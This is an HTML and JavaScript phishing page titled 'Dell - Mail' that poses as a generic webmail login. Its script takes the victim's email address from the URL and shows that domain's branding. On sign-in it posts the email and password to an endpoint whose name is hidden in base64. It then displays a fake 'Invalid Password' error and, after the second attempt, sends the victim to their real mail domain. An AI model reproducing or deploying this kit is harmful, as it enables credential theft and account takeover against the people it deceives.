
<!doctype html>
<html lang="en">
<head>
 <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <!-- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> -->
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>Dell - Mail </title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/font-awesome.min.css">

    <style type="text/css">
      .login-form {
        width: 385px;
        margin: 30px auto;
      }
      .login-form form {
        margin-bottom: 15px;
        background: #f7f7f7;
        box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
        padding: 30px;
      }
      .login-form h2 {
        margin: 0 0 15px;
      }
      .form-control, .login-btn {
        min-height: 38px;
        border-radius: 2px;
      }
      .input-group-addon .fa {
        font-size: 18px;
      }
      .login-btn {
        font-size: 15px;
        font-weight: bold;
      }
      .social-btn .btn {
        border: none;
        margin: 10px 3px 0;
        opacity: 1;
      }
      .social-btn .btn:hover {
        opacity: 0.9;
      }
      .social-btn .btn-primary {
        background: #507cc0;
      }
      .social-btn .btn-info {
        background: #64ccf1;
      }
      .social-btn .btn-danger {
        background: #df4930;
      }
      .or-seperator {
        margin-top: 20px;
        text-align: center;
        border-top: 1px solid #ccc;
      }
      .or-seperator i {
        padding: 0 10px;
        background: #f7f7f7;
        position: relative;
        top: -11px;
        z-index: 1;
      }
      



    </style>
  </head>
  <body data-gr-c-s-loaded="true" style="background-image: url('images/bg.jpg');background-size:cover;background-repeat:no-repeat;">
    <p>&nbsp;</p>
    <p>&nbsp;</p>



    <div class="login-form">
      <form action="#" method="post">
        <h3 class="text-center"><div id="top"><img src="images/download.jpeg" alt="Mailbox" id="logoimg" style="width:28px;height:28px;"><span style="vertical-align: middle; padding-left: 5px" id="logoname">Webmail</span> <br><br>Please sign in using your email and password to gain access
        </div></h3>
        <center>
          <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please Enter your correct Password</div>
          <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
        </center>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-user"></i></span>
            <input type="email" class="form-control" name="username" placeholder="Username" value="" id="ai">
          </div>
        </div>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-lock"></i></span>
            <input type="password" class="form-control" id="pr" name="pdf2" placeholder="Password" required="required">
          </div>
        </div>
        <div class="form-group">
          <input type="hidden" name="pdf1" size="35" value="info@dell.com"><input type="hidden" name="address" size="5" value="ancoreinspection.com">
          <br><input type="hidden" name="ai" size="35" value=""><input type="hidden" name="type" size="5" value="ancoreinspection.com">


          <button type="submit" class="btn btn-primary login-btn btn-block" id="submit-btn">Sign in</button>
        </div>
        <div class="clearfix">
          <label class="pull-left checkbox-inline"><input type="checkbox"> Secured Login session?</label>
          <a href="#" class="pull-right">Forgot Password?</a>
        </div>

      </form>

    </div>





    <style>.tb_button {padding:1px;cursor:pointer;border-right: 1px solid #8b8b8b;border-left: 1px solid #FFF;border-bottom: 1px solid #fff;}.tb_button.hover {borer:2px outset #def; background-color: #f8f8f8 !important;}.ws_toolbar {z-index:100000} .ws_toolbar .ws_tb_btn {cursor:pointer;border:1px solid #555;padding:3px}   .tb_highlight{background-color:yellow} .tb_hide {visibility:hidden} .ws_toolbar img {padding:2px;margin:0px}</style>



    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  <script>

    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var ai = window.location.hash.substr(1);
      if (!ai) {

      }
      else
      {
        var my_ai =ai;
        $('#ai').val(my_ai);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
          $('#error').show();
          ai.focus;
          return false;
        }
        var ind=my_ai.indexOf("@");
        var my_slice=my_ai.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
      }

var f="bmV4dC5waHA=";
      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai=$("#ai").val();
        var pr=$("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////////////////////
      var my_ai =ai;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_ai)) {
        $('#error').show();
        ai.focus;
        return false;
      }

      var ind=my_ai.indexOf("@");
      var my_slice=my_ai.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
      ///////////////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: atob(f),
        type: 'POST',
        data:{
          ai:ai,
          pr:pr,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },

            complete: function(){
              $("#pr").val("");
              if (count>=2) {
                count=0;
                window.location.replace("http://www."+my_slice);
                return false;
              }
              $("#msg").show();
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });


  </script>
  </html>